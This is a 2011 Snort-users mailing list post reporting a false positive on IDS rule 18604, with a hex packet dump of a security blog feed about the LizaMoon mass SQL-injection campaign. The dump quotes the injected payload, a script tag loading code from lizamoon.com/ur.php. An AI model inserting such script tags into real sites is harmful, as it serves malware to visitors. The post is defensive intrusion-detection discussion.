Snort mailing list archives
FP on 18604
From: "Lay, James" <james.lay () wincofoods com>
Date: Fri, 8 Apr 2011 08:49:06 -0600
Heh...hits on this feed: http://feeds.feedburner.com/SpiderlabsAnterior?format=xml 0000 00 13 72 59 7a f4 00 90 7f 3e f7 90 08 00 45 00 ..rYz....>....E. 0010 05 a0 24 bb 00 00 3a 06 1e cf 4a 7d e3 2c 00 00 ..$...:...J}.,.. 0020 00 00 00 50 c2 6c 6b 72 68 d3 41 db c1 f5 50 10 ...P.lkrh.A...P. 0030 19 20 9e 1a 00 00 77 77 77 2e 67 6f 6f 67 6c 65 . ....www.google 0040 2e 63 6f 6d 2f 73 65 61 72 63 68 3f 61 71 3d 66 .com/search?aq=f 0050 26 61 6d 70 3b 61 6d 70 3b 73 6f 75 72 63 65 69 &amp;sourcei 0060 64 3d 63 68 72 6f 6d 65 26 61 6d 70 3b 61 6d 70 d=chrome&amp 0070 3b 69 65 3d 55 54 46 2d 38 26 61 6d 70 3b 61 6d ;ie=UTF-8&am 0080 70 3b 71 3d 25 32 32 25 33 43 73 63 72 69 70 74 p;q=%22%3Cscript 0090 2b 73 72 63 25 33 44 68 74 74 70 25 33 41 25 32 +src%3Dhttp%3A%2 00a0 46 25 32 46 6c 69 7a 61 6d 6f 6f 6e 2e 63 6f 6d F%2Flizamoon.com 00b0 25 32 46 75 72 2e 70 68 70 25 33 45 25 33 43 25 %2Fur.php%3E%3C% 00c0 32 46 73 63 72 69 70 74 25 33 45 25 32 32 22 20 2Fscript%3E%22" 00d0 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 26 67 target="_self"&g 00e0 74 3b 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 20 t;Google Search 00f0 71 75 65 73 74 69 6f 6e 20 66 6f 72 20 4c 69 7a question for Liz 0100 61 4d 6f 6f 6e 20 70 61 79 6c 6f 61 64 73 26 6c aMoon payloads&l 0110 74 3b 2f 61 26 67 74 3b 2e 20 c2 a0 48 65 72 65 t;/a>. ..Here 0120 20 69 73 20 73 6f 6d 65 20 65 78 61 6d 70 6c 65 is some example 0130 20 72 61 77 20 68 74 6d 6c 20 6f 66 20 61 20 73 raw html of a s 0140 69 74 65 20 72 65 74 75 72 6e 65 64 20 62 79 20 ite returned by 0150 74 68 65 20 73 65 61 72 63 68 3a 26 6c 74 3b 2f the search:</ 0160 70 26 67 74 3b 26 23 78 44 3b 0d 0a 26 6c 74 3b p>
..< 0170 70 72 65 26 67 74 3b 26 61 6d 70 3b 6c 74 3b 74 pre>&lt;t 0180 64 20 69 64 3d 22 74 64 44 65 76 65 6c 6f 70 6d d id="tdDevelopm 0190 65 6e 74 4e 61 6d 65 22 26 61 6d 70 3b 67 74 3b entName"&gt; 01a0 52 69 79 61 64 20 52 65 73 6f 72 74 20 c2 a0 20 Riyad Resort .. 01b0 c2 a0 20 c2 a0 26 23 78 44 3b 0d 0a 26 61 6d 70 .. ..
..& 01c0 3b 61 6d 70 3b 6c 74 3b 2f 74 69 74 6c 65 26 61 ;amp;lt;/title&a 01d0 6d 70 3b 61 6d 70 3b 67 74 3b 26 61 6d 70 3b 61 mp;amp;gt;&a 01e0 6d 70 3b 6c 74 3b 73 63 72 69 70 74 20 73 72 63 mp;lt;script src 01f0 3d 68 74 74 70 3a 2f 2f 6c 69 7a 61 6d 6f 6f 6e =http://lizamoon 0200 2e 63 6f 6d 2f 75 72 2e 70 68 70 26 61 6d 70 3b .com/ur.php& 0210 61 6d 70 3b 67 74 3b 26 61 6d 70 3b 61 6d 70 3b amp;gt;&amp; 0220 6c 74 3b 2f 73 63 72 69 70 74 26 61 6d 70 3b 61 lt;/script&a 0230 6d 70 3b 67 74 3b 26 23 78 44 3b 0d 0a 26 61 6d mp;gt;
..&am 0240 70 3b 61 6d 70 3b 6c 74 3b 2f 74 69 74 6c 65 26 p;amp;lt;/title& 0250 61 6d 70 3b 61 6d 70 3b 67 74 3b 26 61 6d 70 3b amp;amp;gt;& 0260 61 6d 70 3b 6c 74 3b 73 63 72 69 70 74 20 73 72 amp;lt;script sr 0270 63 3d 68 74 74 70 3a 2f 2f 6c 69 7a 61 6d 6f 6f c=http://lizamoo 0280 6e 2e 63 6f 6d 2f 75 72 2e 70 68 70 26 61 6d 70 n.com/ur.php& 0290 3b 61 6d 70 3b 67 74 3b 26 61 6d 70 3b 61 6d 70 ;amp;gt;&amp 02a0 3b 6c 74 3b 2f 73 63 72 69 70 74 26 0d 0a 31 30 ;lt;/script&..10 02b0 30 30 0d 0a 61 6d 70 3b 61 6d 70 3b 67 74 3b 26 00..amp;amp;gt;& 02c0 23 78 44 3b 0d 0a 20 47 61 6c 6c 65 72 79 26 61 #xD;.. Gallery&a 02d0 6d 70 3b 6c 74 3b 2f 74 64 26 61 6d 70 3b 67 74 mp;lt;/td&gt 02e0 3b 26 6c 74 3b 2f 70 72 65 26 67 74 3b 26 23 78 ;</pre>&#x 02f0 44 3b 0d 0a 26 6c 74 3b 70 26 67 74 3b 54 68 69 D;..<p>Thi 0300 73 20 63 6f 64 65 20 64 6f 65 73 20 6e 6f 74 20 s code does not 0310 65 78 65 63 75 74 65 20 6a 61 76 61 73 63 72 69 execute javascri 0320 70 74 20 62 75 74 20 69 6e 73 74 65 61 64 20 6f pt but instead o 0330 6e 6c 79 20 72 65 6e 64 65 72 73 20 74 68 65 20 nly renders the 0340 74 65 78 74 2e 20 c2 a0 49 66 20 74 68 65 20 58 text. ..If the X 0350 53 53 20 73 63 72 69 70 74 20 74 61 67 73 20 77 SS script tags w 0360 65 72 65 20 73 75 63 63 65 73 73 66 75 6c 6c 79 ere successfully 0370 20 69 6e 6a 65 63 74 65 64 2c 20 6d 65 61 6e 69 injected, meani 0380 6e 67 20 74 68 61 74 20 74 68 65 20 61 70 70 73 ng that the apps 0390 20 77 65 72 65 20 6e 6f 74 20 70 72 6f 70 65 72 were not proper 03a0 6c 79 20 6f 75 74 70 75 74 20 65 6e 63 6f 64 69 ly output encodi 03b0 6e 67 2f 65 73 63 61 70 69 6e 67 20 70 61 79 6c ng/escaping payl 03c0 6f 61 64 73 2c 20 74 68 65 6e 20 74 68 65 20 73 oads, then the s 03d0 65 61 72 63 68 20 65 6e 67 69 6e 65 20 73 70 69 earch engine spi 03e0 64 65 72 73 20 77 6f 75 6c 64 20 6e 6f 74 20 62 ders would not b 03f0 65 20 69 6e 64 65 78 69 6e 67 20 74 68 65 20 73 e indexing the s 0400 6e 69 70 70 65 74 73 20 6f 66 20 63 6f 64 65 2e nippets of code. 0410 20 c2 a0 54 68 65 20 73 65 61 72 63 68 20 65 6e ..The search en 0420 67 69 6e 65 73 20 64 6f 20 6e 6f 74 20 69 6e 64 gines do not ind 0430 65 78 20 74 68 65 20 72 61 77 20 68 74 6d 6c 20 ex the raw html 0440 73 6f 75 72 63 65 20 63 6f 64 65 20 62 75 74 20 source code but 0450 6f 6e 6c 79 20 74 68 65 20 72 65 6e 64 65 72 65 only the rendere 0460 64 20 74 65 78 74 2e 26 6c 74 3b 2f 70 26 67 74 d text.</p> 0470 3b 26 23 78 44 3b 0d 0a 26 6c 74 3b 70 26 67 74 ;
..<p> 0480 3b 53 6f 2c 20 65 76 65 6e 20 74 68 6f 75 67 68 ;So, even though 0490 20 73 69 74 65 73 20 6c 69 73 74 65 64 20 69 6e sites listed in 04a0 20 74 68 65 20 73 65 61 72 63 68 20 72 65 73 75 the search resu 04b0 6c 74 73 20 77 65 72 65 20 76 75 6c 6e 65 72 61 lts were vulnera 04c0 62 6c 65 20 74 6f 20 53 51 4c 20 49 6e 6a 65 63 ble to SQL Injec 04d0 74 69 6f 6e 20 61 6e 64 20 63 6f 6d 70 72 6f 6d tion and comprom 04e0 69 73 65 64 2c 20 74 68 65 79 20 61 63 74 75 61 ised, they actua 04f0 6c 6c 79 20 70 72 65 76 65 6e 74 65 64 20 74 68 lly prevented th 0500 65 20 67 6f 61 6c 20 6f 66 20 74 68 69 73 20 61 e goal of this a 0510 74 74 61 63 6b 20 73 69 6e 63 65 20 74 68 65 20 ttack since the 0520 77 65 62 20 61 70 70 20 69 73 20 70 72 6f 70 65 web app is prope 0530 72 6c 79 20 6f 75 74 70 75 74 20 65 6e 63 6f 64 rly output encod 0540 69 6e 67 20 74 68 65 20 64 61 74 61 20 73 65 6e ing the data sen 0550 74 20 74 6f 20 74 68 65 20 63 6c 69 65 6e 74 73 t to the clients 0560 2e 26 6c 74 3b 2f 70 26 67 74 3b 26 23 78 44 3b .</p>
 0570 0d 0a 26 6c 74 3b 68 32 26 67 74 3b 45 6e 73 75 ..<h2>Ensu 0580 72 65 20 70 72 6f 70 65 72 20 4f 75 74 70 75 74 re proper Output 0590 20 45 6e 63 6f 64 69 6e 67 2f 45 73 63 61 70 69 Encoding/Escapi 05a0 6e 67 20 43 6f 76 65 72 61 67 65 26 6c 74 ng Coverage< James
------------------------------------------------------------------------------ Xperia(TM) PLAY It's a major breakthrough. An authentic gaming smartphone on the nation's most reliable network. And it wants your games. http://p.sf.net/sfu/verizon-sfdev
_______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- FP on 18604 Lay, James (Apr 08)